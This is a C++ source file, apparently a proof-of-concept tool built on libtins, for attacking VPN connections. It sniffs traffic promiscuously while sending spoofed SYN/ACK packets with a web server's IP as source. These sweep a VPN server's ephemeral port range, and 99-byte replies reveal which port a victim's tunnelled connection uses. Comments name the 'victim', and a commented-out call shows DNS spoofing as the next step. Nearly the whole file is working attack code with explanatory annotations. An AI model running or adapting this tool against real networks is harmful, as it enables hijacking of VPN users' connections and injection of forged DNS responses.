

  1. #include <tins/tins.h>
  2. #include <cassert>
  3. #include <iostream>
  4. #include <string>
  5. #include <unistd.h>
  6. #include <thread>
  7. using std::thread;
  8. using std::cout;
  9. using std::string;
  10. using std::vector;
  11. using namespace Tins;
// State shared between main(), the two capture threads and the sender
// loop. None of it is synchronized: the sniffer callbacks write these
// plain globals and phase_two_spread polls them.
int current_spoof_port = 0; // last TCP dport seen from source_ip (written by handle_send_packet)
int best_port = 0;          // port reported by handle_packet; 0 means nothing seen yet
int chack_count = 0;        // declared but never used in this file
bool is_running = true;     // cleared by main() to end both sniff loops
bool verbose = false;       // progress output; main() turns it on unconditionally
bool sniffed_resp = false;  // set by handle_packet, never read
std::string dest_ip;        // argv[3] in main()
std::string source_ip;      // argv[1] in main()
// Emits `count` separator lines on stdout; a no-op unless the global
// verbose flag is set.
void print_divider(int count) {
    for (int line = 0; line < count; ++line) {
        if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
    }
}
// Sniffer callback for the second capture thread (sniff_send_stuff).
// Records the TCP destination port of the latest packet sent by
// source_ip into the global current_spoof_port, which handle_packet
// (running on the other capture thread) later copies into best_port.
// The global is shared between those threads without synchronization.
// Returns is_running so the sniff loop ends once main() clears it.
bool handle_send_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
// Traffic from source_ip: remember which port it was addressed to.
if (ip.src_addr() == source_ip) {
current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
//cout << "Current Spoof Port (sniff) = " << current_spoof_port << "\n";
}
// Traffic from dest_ip: the payload size is read and a remainder is
// computed, but neither value is used afterwards.
if (ip.src_addr() == dest_ip) {
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << "Payload Size = " << payload << "\n";
const int remainder = payload % 115;
}
return is_running;
}
// Sniffer callback for the first capture thread (sniff_stuff).
// Looks for a packet whose IP source is dest_ip carrying a raw payload
// of exactly 99 bytes. When one is seen, the port last recorded by
// handle_send_packet (current_spoof_port) is copied into best_port,
// which the sender loop in phase_two_spread polls to stop its sweep.
// current_spoof_port and best_port are plain globals shared across
// threads without synchronization.
// Returns is_running so the sniff loop ends once main() clears it.
bool handle_packet(PDU &some_pdu) {
const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
// in this case we're looking for a packet from the vpn server to the vpn client
//
// the src ip should be the VPN server and dest ip should be
// public address of victim
if (ip.src_addr() == dest_ip) { // dest_ip should be public VPN IP
const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
//cout << "Payload size: " << payload << "\n";
if (payload == 99) { // could be a NAT'ed attacker packet
cout << "sniffed response from VPN server with port: " << current_spoof_port << " and size: " << payload << " \n";
best_port = current_spoof_port;
sniffed_resp = true; // written here but never read elsewhere in this file
}
}
return is_running;
}
// Body of the first capture thread: promiscuous capture on the "any"
// pseudo-interface, handing every packet to handle_packet until that
// callback returns false.
void sniff_stuff() {
    SnifferConfiguration cfg;
    cfg.set_promisc_mode(true);
    // No BPF filter is applied; a destination-host filter was once
    // considered here (//config.set_filter("ip dst 10.0.0.215")) and
    // ssh traffic is still not filtered out.
    Sniffer("any", cfg).sniff_loop(handle_packet);
}
// Body of the second capture thread: same promiscuous "any" capture as
// sniff_stuff, but every packet goes to handle_send_packet until that
// callback returns false.
void sniff_send_stuff() {
    SnifferConfiguration cfg;
    cfg.set_promisc_mode(true);
    Sniffer("any", cfg).sniff_loop(handle_send_packet);
}
// Spreads SYNs across the victim's entire port range
// coming from a specific remote_ip:port
//
// Concretely: builds one IP/TCP packet with IP source = source_ip,
// IP destination = dest_ip, TCP source port = sport and the SYN|ACK
// flags set, then rewrites its destination port and re-sends it from a
// hard-coded interface. Round 1 walks start_port..end_port at ~500 us
// per packet; round 2 re-sweeps a 600-port window around round 1's
// answer at 10 ms per packet. Each round stops early once the capture
// thread has set best_port (a plain global polled here without
// synchronization).
//
// On the wire this is a burst of SYN/ACKs from a single source
// address:port to consecutive destination ports of one host -- the
// pattern a network monitor would key on.
//
// The parameters source_ip and dest_ip shadow the globals of the same
// name. Returns best_port as left by round 2 (0 if nothing was seen).
int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
PacketSender sender;
NetworkInterface iface("enp0s9"); // interface name is hard-coded
IP pkt = IP(dest_ip, source_ip) / TCP(40400, sport); // libtins order: IP(dst, src), TCP(dport, sport)
TCP& tcp = pkt.rfind_pdu<TCP>();
tcp.flags(TCP::SYN | TCP::ACK);
int current_port = best_port;
int count = 0;
int i = start_port;
bool found = false;
// Round 1: fast sweep of the whole range.
while (i < end_port && !found) {
tcp.dport(i);
sender.send(pkt, iface);
//cout << "Current port= " << i << "\n";
usleep(500);
count++;
i ++;
if (count % 50 == 0) { // every 50 packets: an extra pause and a progress line
usleep(1000);
cout << " Current port = " << i << ". Best port = " << best_port << ".\n";
}
if (best_port != 0) found = true; // best_port is written by handle_packet on the capture thread
}
usleep(1000000); // sleep to give victim time to respond w chack
current_port = best_port;
if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n";
// In round 1 we spoofed really fast (10 sleep) to get a good estimate of the
// port in use. Round 2, we spoof slower from about 50 packets back to account
// for the delay in response and hopefully get the exact port number in use.
print_divider(1);
usleep(1000000 / 2); // half a second before round 2
// sniffed_chack = false;
// Round 2: window of [current_port - 300, current_port + 300), with
// best_port cleared first so only a response during this round counts.
int j = current_port - 300;
found = false;
best_port = 0;
while (j < (current_port + 300) && !found) {
tcp.dport(j); // set the packets dest port to current guess
sender.send(pkt, iface);
cout << "Current guess port = " << j << " and best port = " << best_port << " \n";
usleep(10000);
j ++;
if (best_port != 0) found = true;
}
usleep(1000000); // give the capture thread time to report a late response
if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n";
return best_port;
}
// Runs one phase_two_spread pass over [start_port, end_port) and returns
// the port it guessed. The original "until found" loop always completes
// on its first iteration, so this is a single pass.
int find_port(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
    const int guessed = phase_two_spread(source_ip, sport, dest_ip, start_port, end_port);
    print_divider(1);
    if (verbose) cout << "finished phase 2 w possible port: " << guessed << "\n";
    return guessed;
}
// Entry point. Expects exactly three arguments (source_ip, sport,
// dest_ip), starts the two capture threads, runs a single find_port
// pass over 32768..61000, then clears is_running so both sniff loops
// end and joins them. The guessed port is used as the process exit
// status, so only its low byte reaches the shell; the commented-out
// print is the intended way to report it.
int main(int argc, char** argv) {
if (argc != 4) {
cout << "sike wrong number of args ---> (source_ip, sport, dest_ip)\n";
return 0;
}
source_ip = argv[1]; // web server IP
int sport = atoi(argv[2]); // most likely 80 or 443 -- atoi yields 0 on non-numeric input, unchecked
dest_ip = argv[3]; // vpn server IP
verbose = true; // always on; the global default of false is never used
int start_port = 32768;
int end_port = 61000;
print_divider(2);
// Both capture threads must be running before the sweep starts, since
// the sweep polls best_port, which only they write.
thread sniff_thread(sniff_stuff);
thread send_sniff_thread(sniff_send_stuff);
int p = find_port(source_ip, sport, dest_ip, start_port, end_port);
//cout << p << "\n";
print_divider(1);
//if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n";
//if (verbose) cout << "Attempting to spoof DNS back on port ..\n";
//int res = spoof_dns(source_ip, sport, dest_ip, p);
// The callbacks return is_running, so clearing it makes each sniff loop
// exit on the next captured packet.
is_running = false;
sniff_thread.join();
send_sniff_thread.join();
return p;
}